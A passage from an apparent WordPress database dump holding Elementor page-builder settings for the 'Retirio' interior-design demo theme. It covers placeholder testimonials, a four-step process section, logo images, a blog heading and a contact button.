solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4222,4920,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4223,4920,'_elementor_pro_version','3.8.1'),(4224,4921,'_wp_page_template','elementor_header_footer'),(4225,4921,'_elementor_edit_mode','builder'),(4226,4921,'_elementor_template_type','wp-page'),(4227,4921,'_elementor_version','3.8.1'),(4228,4921,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.s